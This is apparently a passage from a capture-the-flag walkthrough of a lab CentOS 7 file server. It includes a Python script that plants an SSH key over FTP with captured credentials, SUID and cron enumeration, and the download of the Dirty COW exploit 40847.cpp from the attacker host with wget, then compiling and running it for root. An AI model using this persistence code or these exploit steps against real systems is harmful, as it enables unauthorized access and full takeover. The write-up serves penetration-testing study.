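"""Plant an SSH public key over FTP and make sure sshd will accept it.
Added example, not the author's commands. The key line used by the
self-test is a constructed all-zero ssh-ed25519 blob, not a real key."""
import base64
import ftplib
import io
import struct


def dummy_ed25519_pubkey() -> str:
    """Constructed, syntactically valid public-key line with an all-zero key."""
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(32)
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " test@example"


def restricted_key_line(pubkey_line: str, from_addr: str) -> str:
    """Check that the line is '<type> <base64> [comment]' and that the blob
    really starts with the declared type (sshd silently skips lines it cannot
    parse), then prefix authorized_keys options so the key only works from
    from_addr and cannot forward an agent or X11."""
    parts = pubkey_line.split()
    if len(parts) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    ktype, b64 = parts[0], parts[1]
    blob = base64.b64decode(b64, validate=True)
    (n,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + n] != ktype.encode():
        raise ValueError("key blob does not match the declared key type")
    return f'from="{from_addr}",no-agent-forwarding,no-X11-forwarding {ktype} {b64}'


def plant_key(host: str, user: str, password: str, key_line: str, port: int = 21) -> int:
    """Append key_line to ~/.ssh/authorized_keys of `user` over FTP and return
    the number of bytes stored. Existing entries are kept (fetch, append,
    store). SITE CHMOD is attempted so .ssh is 0700 and the file 0600; sshd's
    StrictModes only refuses group/world-writable paths, so 0644 works too,
    but if the server has SITE CHMOD disabled the FTP umask decides."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=10)
    ftp.login(user, password)
    try:
        try:
            ftp.mkd(".ssh")
        except ftplib.error_perm:
            pass  # directory already exists
        buf = io.BytesIO()
        try:
            ftp.retrbinary("RETR .ssh/authorized_keys", buf.write)
        except ftplib.error_perm:
            pass  # no authorized_keys yet
        data = buf.getvalue()
        if data and not data.endswith(b"\n"):
            data += b"\n"
        data += key_line.encode() + b"\n"
        ftp.storbinary("STOR .ssh/authorized_keys", io.BytesIO(data))
        for mode, path in (("700", ".ssh"), ("600", ".ssh/authorized_keys")):
            try:
                ftp.sendcmd(f"SITE CHMOD {mode} {path}")
            except ftplib.error_perm:
                pass  # SITE CHMOD not allowed on this server
        return len(data)
    finally:
        ftp.quit()


if __name__ == "__main__":
    # Usage with this page's values; smbuser.pub is the file ssh-keygen wrote.
    with open("smbuser.pub") as f:
        line = restricted_key_line(f.read().strip(), "192.168.56.106")
    print(plant_key("192.168.56.104", "smbuser", "rootroot1", line))
```

Afterwards log in with ssh -i smbuser smbuser@<target>; if it still asks for a password or fails, the usual culprits are the directory or file being group/world-writable, or AuthorizedKeysFile pointing somewhere other than .ssh/authorized_keys (check the sshd_config copy from the share).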

Privilege escalation

Neither cron jobs nor SUID binaries gave anything; sudo wants a password and systemd-run requires interactive authentication.

[smbuser@fileserver ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

[smbuser@fileserver ~]$ ls -liah /etc/crontab
34310891 -rw-r--r--. 1 root root 451 Jun 10 2014 /etc/crontab
[smbuser@fileserver ~]$ find / -type f -perm -04000 -ls 2>/dev/null
34179364 64 -rwsr-xr-x 1 root root 64200 Mar 6 2015 /usr/bin/chage
34179365 80 -rwsr-xr-x 1 root root 78168 Mar 6 2015 /usr/bin/gpasswd
34175860 44 -rwsr-xr-x 1 root root 41752 Mar 6 2015 /usr/bin/newgrp
34182648 44 -rwsr-xr-x 1 root root 44232 Mar 6 2015 /usr/bin/mount
34179705 24 -rws--x--x 1 root root 23960 Mar 6 2015 /usr/bin/chfn
34179486 24 -rws--x--x 1 root root 23856 Mar 6 2015 /usr/bin/chsh
34182663 32 -rwsr-xr-x 1 root root 32064 Mar 6 2015 /usr/bin/su
34182667 32 -rwsr-xr-x 1 root root 31960 Mar 6 2015 /usr/bin/umount
34362148 28 -rwsr-xr-x 1 root root 27656 Jun 10 2014 /usr/bin/pkexec
34362174 60 -rwsr-xr-x 1 root root 57536 Jul 30 2014 /usr/bin/crontab
34676864 128 ---s--x--x 1 root root 130720 Mar 6 2015 /usr/bin/sudo
34296737 208 ---s--x--- 1 root stapusr 212080 Oct 18 2019 /usr/bin/staprun
34631418 28 -rwsr-xr-x 1 root root 27832 Jun 10 2014 /usr/bin/passwd
67395239 12 -rwsr-xr-x 1 root root 11208 Mar 6 2015 /usr/sbin/pam_timestamp_check
67395241 36 -rwsr-xr-x 1 root root 36264 Mar 6 2015 /usr/sbin/unix_chkpwd
67574143 12 -rwsr-xr-x 1 root root 11296 Aug 9 2019 /usr/sbin/usernetctl
68676026 116 -rwsr-xr-x 1 root root 117432 Aug 9 2019 /usr/sbin/mount.nfs
67585748 16 -rwsr-xr-x 1 root root 15416 Jun 10 2014 /usr/lib/polkit-1/polkit-agent-helper-1
101817405 60 -rwsr-x--- 1 root dbus 58024 Mar 14 2019 /usr/libexec/dbus-1/dbus-daemon-launch-helper
[smbuser@fileserver ~]$ systemd-run -t bash
Failed to start transient service unit: Interactive authentication required.
[smbuser@fileserver ~]$ sudo systemd-run -t bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for smbuser:

Environment variables

[smbuser@fileserver ~]$ export $PATH
-bash: export: `/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/smbuser/.local/bin:/home/smbuser/bin': not a valid identifier

Nothing in PATH either (export $PATH above was a typo for echo $PATH, but bash's error message printed the value anyway, and the user-writable directories come last, so nothing writable precedes the system directories). So on to kernel exploits.

'Mutagen Astronomy' Local Privilege Escalation needs more than 32 GB of RAM; SUID Position Independent Executable 'PIE' Local Privilege Escalation errored out when run; Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation returned nothing; Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation just kept running. By then I was getting impatient, so I went to a search engine with the keywords kernel 3.10 exploit privilege, found the Dirty COW exploit there (CVE-2016-5195, Exploit-DB 40847), and it worked. Two things worth knowing before running it: the kernel here is 3.10.0-229.el7, the CentOS 7.1 kernel built in March 2015, well before the October 2016 fix; and 40847 works by overwriting root's entry in /etc/passwd with a known password hash (hence "Root password is: dirtyCowFun"), so keep a copy of /etc/passwd and restore it once you have your shell. Dirty COW is a race condition and can also leave the kernel unstable.
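Upstream version numbers are a poor guide on RHEL/CentOS: fixes are backported into the 3.10.0 series, which is why exploits keyed to upstream 3.14/3.15 went nowhere here while Dirty COW worked. The comparison that matters is against the distribution's package release. Below is an added example, not from the write-up: a re-implementation of rpm's version ordering (rpmvercmp) and a check of uname -r against the first RHEL 7 kernel that carried the CVE-2016-5195 fix. That fixed version, kernel-3.10.0-327.36.3.el7 from RHSA-2016:2098, is supplied from my own knowledge rather than from the page, so confirm it against the advisory before relying on it.

```python
"""Decide whether an el7 kernel predates the Dirty COW (CVE-2016-5195) fix by
comparing the package release string the way rpm does. Added example; the
fixed-version constant is the editor's assumption, not from the write-up."""
import re

_SEG = re.compile(r"\d+|[A-Za-z]+|~")


def rpmvercmp(a: str, b: str) -> int:
    """Re-implementation of rpm's version ordering. Strings are split into
    numeric, alphabetic and '~' segments (separators are ignored); numerics
    compare as integers, alphas lexically, a numeric segment is newer than an
    alphabetic one, '~' (pre-release) sorts before anything including the end
    of the string, and otherwise the longer string is newer. Returns -1/0/1."""
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    i = 0
    while i < len(sa) or i < len(sb):
        x = sa[i] if i < len(sa) else ""
        y = sb[i] if i < len(sb) else ""
        if x == "~" or y == "~":
            if x != y:
                return -1 if x == "~" else 1
        elif not x or not y:
            return -1 if not x else 1
        elif x != y:
            xd, yd = x.isdigit(), y.isdigit()
            if xd != yd:
                return 1 if xd else -1
            if xd:
                return (int(x) > int(y)) - (int(x) < int(y))
            return (x > y) - (x < y)
        i += 1
    return 0


_ARCHES = ("x86_64", "i686", "aarch64", "ppc64le", "s390x")


def split_kernel_release(uname_r: str) -> tuple[str, str]:
    """'3.10.0-229.el7.x86_64' -> ('3.10.0', '229.el7'): rpm version and
    release of the running kernel package, architecture suffix dropped."""
    version, _, release = uname_r.partition("-")
    for arch in _ARCHES:
        if release.endswith("." + arch):
            release = release[: -(len(arch) + 1)]
            break
    return version, release


def kernel_older_than(uname_r: str, fixed: str) -> bool:
    """True if the running kernel package sorts before `fixed` in rpm order."""
    v, r = split_kernel_release(uname_r)
    fv, fr = split_kernel_release(fixed)
    return (rpmvercmp(v, fv) or rpmvercmp(r, fr)) < 0


# First RHEL/CentOS 7 kernel carrying the CVE-2016-5195 fix (RHSA-2016:2098).
# Assumption from memory of the advisory; verify before relying on it.
DIRTY_COW_FIXED_EL7 = "3.10.0-327.36.3.el7"


def dirty_cow_candidate(uname_r: str) -> bool:
    """True when an el7 kernel is older than the fixed package. Refuses
    non-el7 kernels: the threshold means nothing for other distributions."""
    _, release = split_kernel_release(uname_r)
    if "el7" not in release:
        raise ValueError(f"not an el7 kernel release: {uname_r!r}")
    return kernel_older_than(uname_r, DIRTY_COW_FIXED_EL7)


if __name__ == "__main__":
    import platform
    rel = platform.release()  # same string as uname -r
    try:
        print(rel, "Dirty COW candidate:", dirty_cow_candidate(rel))
    except ValueError as e:
        print(e)
```

The same comparison works for any backported CVE once you know the fixed package release from the vendor advisory; rpm -q --changelog kernel on the target is the authoritative check when rpm is available, since it lists the CVEs each release fixed.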

[smbuser@fileserver tmp]$ wget http://192.168.56.106:8088/40847.cpp
--2023-06-25 18:26:09-- http://192.168.56.106:8088/40847.cpp
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10212 (10.0K) [text/x-c++src]
Saving to: ‘40847.cpp’

100%[============================================================================>] 10,212 --.-K/s in 0s

2023-06-25 18:26:09 (396 MB/s) - ‘40847.cpp’ saved [10212/10212]

[smbuser@fileserver tmp]$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
[smbuser@fileserver tmp]$ ls
40847.cpp dcow
[smbuser@fileserver tmp]$ ./dcow
Running ...
Received su prompt (Password: )
Root password is: dirtyCowFun
Enjoy! :-)
[smbuser@fileserver tmp]$ su -
Password:
Last login: Sun Jun 25 18:26:29 IST 2023 on pts/1
[root@fileserver ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@fileserver ~]# whoami
root
[root@fileserver ~]# cd /root
[root@fileserver ~]# ls
proof.txt
[root@fileserver ~]# cat proof.txt
Best of Luck
af52e0163b03cbf7c6dd146351594a43

https://i3eg1nner.github.io/2023/06/3bf613bad65c.html
Author: I3eg1nner
Published: 25 June 2023